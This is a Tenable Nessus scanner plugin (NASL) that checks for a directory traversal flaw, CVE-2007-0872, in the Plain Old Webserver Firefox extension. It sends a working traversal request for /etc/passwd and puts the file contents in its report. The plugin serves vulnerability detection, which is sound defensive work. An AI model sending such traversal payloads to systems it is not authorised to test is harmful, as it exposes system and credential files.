#
# (C) Tenable Network Security
#


  desc = "
Synopsis :

The remote web server is susceptible to a directory traversal attack. 

Description :

The remote host is running Plain Old Webserver, a Firefox extension
that acts as a web server. 

The version of Plain Old Webserver (pow) installed on the remote host
fails to sanitize the URL of directory traversal sequences.  An
unauthenticated attacker can exploit this to read files on the
affected host subject to the permissions of the user id under which
Firefox runs. 

See also :

http://archives.neohapsis.com/archives/fulldisclosure/2007-02/0197.html

Solution :

Unknown at this time. 

Risk factor : 

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)";


if (description)
{
  script_id(24669);
  script_version("$Revision: 1.4 $");

  script_cve_id("CVE-2007-0872");
  script_bugtraq_id(22502);
  script_xref(name:"OSVDB", value:"33174");

  script_name(english:"Plain Old Webserver Directory Traversal Vulnerability");
  script_summary(english:"Tries to read a file using POW");
 
  script_description(english:desc);
 
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 6670);

  exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:6670);
if (!get_port_state(port)) exit(0);


# Make sure the banner looks like POW.
banner = get_http_banner(port:port);
if (!banner || "pow_server: POW" >!< banner) exit(0);


# Try to read a file.
file = "/etc/passwd";
req = http_get(item:string("/../../../../../../../../../../", file), port:port);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
if (res == NULL) exit(0);

if (egrep(string:res, pattern:"root:.*:0:[01]:"))
{
  report = string(
    desc,
    "\n\n",
   "Plugin output :\n",
    "\n",
    "Here are the contents of the file '", file, "' that Nessus\n",
    "was able to read from the remote host :\n",
    "\n",
    res
  );
  security_warning(port:port, data:report);
}

